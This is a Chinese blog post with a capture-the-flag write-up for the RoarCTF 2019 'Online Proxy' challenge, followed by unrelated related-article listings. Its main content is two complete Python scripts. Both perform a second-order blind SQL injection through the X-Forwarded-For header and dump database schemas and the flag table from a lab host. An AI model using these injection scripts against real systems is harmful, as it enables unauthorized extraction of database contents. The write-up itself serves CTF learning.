[RoarCTF 2019]Online Proxy 盲注

最新推荐文章于 2024-05-22 21:00:00 发布
最新推荐文章于 2024-05-22 21:00:00 发布
阅读量3k 收藏 1
点赞数
文章标签: 安全 web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/122700379
版权

[RoarCTF 2019]Online Proxy
bp抓包放包,可以用X-Forwarded-For修改IP。last Ip是存在数据库里的,我们先写一个sql注入语句作为IP,然后再修改两次其他的IP。这两次的IP要一样,那么第二次系统就要从数据库中查询last Ip,触发sql注入。
在这里插入图片描述
盲注:

import requests

url = "http://node4.buuoj.cn:26940//"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=e14e99c2-c580-43e3-94ba-68f2bcf0489c",
	"X-Forwarded-For" : ""
}
result = ""
for i in range(1,100):
	l = 32
	r = 127
	mid = (l+r)>>1
	while(l<r):
		#head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i,mid)
		#head["X-Forwarded-For"] = "0' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='F4l9_D4t4B45e')),{0},1))>{1} or '0".format(i, mid)
		#head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(column_name) from information_schema.columns where(table_name='F4l9_t4b1e')),{0},1))>{1} or '0".format(i, mid)
		head["X-Forwarded-For"] = "0' or ascii(substr((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)),{0},1))>{1} or '0".format(i, mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = "1111"
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if (mid == 32 or mid == 127):
		break
	result+=chr(mid)
	print(result)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
最后贴一下官方writeup,用数字直接把数据库的内容输出来,非常快。太强了

import requests

target = "http://node4.buuoj.cn:26940/"

def execute_sql(sql):
    print("[*]请求语句:" + sql)
    return_result = ""

    payload = "0'|length((" + sql + "))|'0"
    session = requests.session()
    r = session.get(target, headers={'X-Forwarded-For': payload})
    r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})
    r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})
    start_pos = r.text.find("Last Ip: ")
    end_pos = r.text.find(" -->", start_pos)
    length = int(r.text[start_pos + 9: end_pos])
    print("[+]长度:" + str(length))

    for i in range(1, length + 1, 5):
        payload = "0'|conv(hex(substr((" + sql + ")," + str(i) + ",5)),16,10)|'0"

        r = session.get(target, headers={'X-Forwarded-For': payload}) # 将语句注入
        r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})    # 查询上次IP时触发二次注入
        r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})    # 再次查询得到结果
        start_pos = r.text.find("Last Ip: ")
        end_pos = r.text.find(" -->", start_pos)
        result = int(r.text[start_pos + 9: end_pos])
        return_result += bytes.fromhex(hex(result)[2:]).decode('utf-8')

        print("[+]位置 " + str(i) + " 请求五位成功:" + bytes.fromhex(hex(result)[2:]).decode('utf-8'))

    return return_result


# 获取数据库
print("[+]获取成功:" + execute_sql("SELECT group_concat(SCHEMA_NAME) FROM information_schema.SCHEMATA"))

# 获取数据库表
print("[+]获取成功:" + execute_sql("SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e'"))

# 获取数据库表
print("[+]获取成功:" + execute_sql("SELECT group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e' AND TABLE_NAME = 'F4l9_t4b1e' "))

# 获取表中内容
print("[+]获取成功:" + execute_sql("SELECT group_concat(F4l9_C01uMn) FROM F4l9_D4t4B45e.F4l9_t4b1e"))
scrawman
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ProxyWeb:代理网页
07-23
代理人 这是代理背后的网络服务。 目前它基于 Play,但编写的代码允许轻松换出 REST 层。
Proxy Online
weixin_30527143的博客
12-14 693
http://freenuts.com/top-10-free-online-proxy-websites/ aniscartujo.com browse007.com enoughschool.com hidemy.biz nobodycanstop.us polysolve.com schoolisgood.com sslunblock.com www.dtunnel.c...
[RoarCTF 2019]Online Proxy --不会编程的崽
不会编程的崽的博客
03-29 801
sql注入 盲注
[RoarCTF 2019]Online Proxy
feng的博客
12-26 638
知识点 二次注入 WP 这题挺坑的点就是会被误以为是SSRF,我就陷在SSRF里出不来了。 看了WP,发现是SQL二次注入。 根据f12,看到有这个: 根据当前和之前ip的显示,猜测是把ip存到了数据库中,因此通过更改x-forwarded-for可以有不同的回显,而且先注入0' or length(database())>0 or '0,然后再请求2次x-forwarded-for为1,这时候回显出来的Last Ip居然是1,因此判断存在x-forwarded-for的二次注入。 但是这题是有
JsProxy A js proxy online
04-21
A js proxy online or js packer offline.See help.html for more information.
Desktop Proxy for Online Dictionaries-开源
06-30
DDict 是一个可扩展的桌面在线词典集成代理。 它驻留在系统托盘中,允许用户同时在多个在线词典中快速查找单词
rails-reverse-proxy:Ruby on Rails的反向代理
02-06
Rails-反向代理Ruby on Rails的反向代理。 反向代理接受来自客户端的请求,将其转发到可以满足该请求的服务器,然后将服务器的响应返回给客户端安装你知道该怎么做。 在您的Gemfile中gem 'rails-reverse-proxy' 然后...
on-dhcp-proxy
05-03
on-dhcp-proxy提供了DHCP代理服务,以使RackHD PXE工作流引擎能够与现有的DHCP服务器一起运行。 版权所有2015,EMC,Inc. 设置 要将on-dhcp-proxy作为独立服务运行,它要求isc-dhcp-server在后台运行。 要安装isc...
3proxy-0.9.3_3proxy_
09-29
一个功能强大的代理软件,通过简单的配置即可实现快速透传
[RoarCTF 2019]Online Proxy(x-forwarded-for盲注)
qq_62046696的博客
01-05 581
这道题点开题目然后题目显示不出网,一开始误认为是ssrf了,但是没有更多的信息了。源码有一个ip会不会是修改X-Forwarded-For就可以了呢,抓包试一下,发现有两个ip,一个当前一个是last上一个的意思把,这个本地是我火狐插件默认的。然后这里因为我经验少没感觉,看了大佬的讲解,才突然悟了,这一眼就可以看出一个sql注入的问题,因为last肯定存储到了一个数据库的里面不然查询10.244.80.206怎么能显示出来呢。
[RoarCTF 2019]Online Proxy——二次注入,又是你?
Mrs_H的博客
10-30 922
前言 最近真属于是”多事之秋“了,平常不留作业的课最近都破天荒的留了作业。最近做题目的节奏又被打乱了,哎无语。之后想写一篇关于flask的文章,不知道什么时候才有机会,现在还是以sql注入为主。不说了,先看题吧。 正文 这道题又是二次注入的题目,但是注入点较之前的注入点位有很大的不同。这次的注入点在数据包头的XFF字段。 那么如何进行二次注入呢?请考虑如下代码 select '0'+(length(database())>0)+'0' from user 如果我们将上面的查询语句提前插入了数据库中,
几个在线的web代理
weixin_34186128的博客
08-14 729
http://www.cemsg.com/web/ http://pooling.info http://proxyol.com http://www.haozs.net/Proxyonline.htm http://web.proxycn.com/
JavaWeb -----代理 Proxy
xiaozhegaa的博客
03-12 3205
(一)引入:为什么会有代理!! 原因是:阻止对目标对象的直接访问,或者就是在执行目标对象时,在执行目标对象前后进行一系列的操作。举个例子来说,1:在执行一个方法之前必须要对该“方法”做“日记”,记录每个操作,这样可以在执行目标对象之前,先执行一个的操作,然后执行该方法。2:又如明星唱歌例子,商家首先找到该明星的代理公司,谈妥后再找该明星去唱歌,中间代理起拦截等的操作 (二)代理类别:步步推进,
简单3步,ERP、OA、CRM等客户端,安全远程访问服务端
最新发布
oray2013的专栏
05-22 262
然而,如何确保在不同地点的员工都能安全、便捷地访问公司内网的C/S(Client/Server)架构办公系统,是一个亟待解决的问题。采用贝锐花生壳内网穿透服务,可以简化这些步骤,使得远程访问变得异常简单。无需公网IP,无需繁琐的路由和网关配置,简单三步,即可实现远程访问。目前,除了上述举例的ERP系统,市面上主流C/S(Client/Server)架构办公系统均可搭配贝锐花生壳实现远程访问。传统的远程访问解决方案往往需要复杂的网络配置,包括公网IP的申请、路由和网关的设置等。
【Linux安全】iptables防火墙(二)
F12138X的博客
05-22 827
驽马十驾,功在不舍
Proxy proxy
09-13
Proxy proxy 是一个使用 Proxy 构造函数创建的代理实例。它通过 Proxy 构造函数的第一个参数 target 来指定要代理的目标对象,通过第二个参数 handler 来指定拦截操作的行为。Proxy 实例提供了一种机制,可以在目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值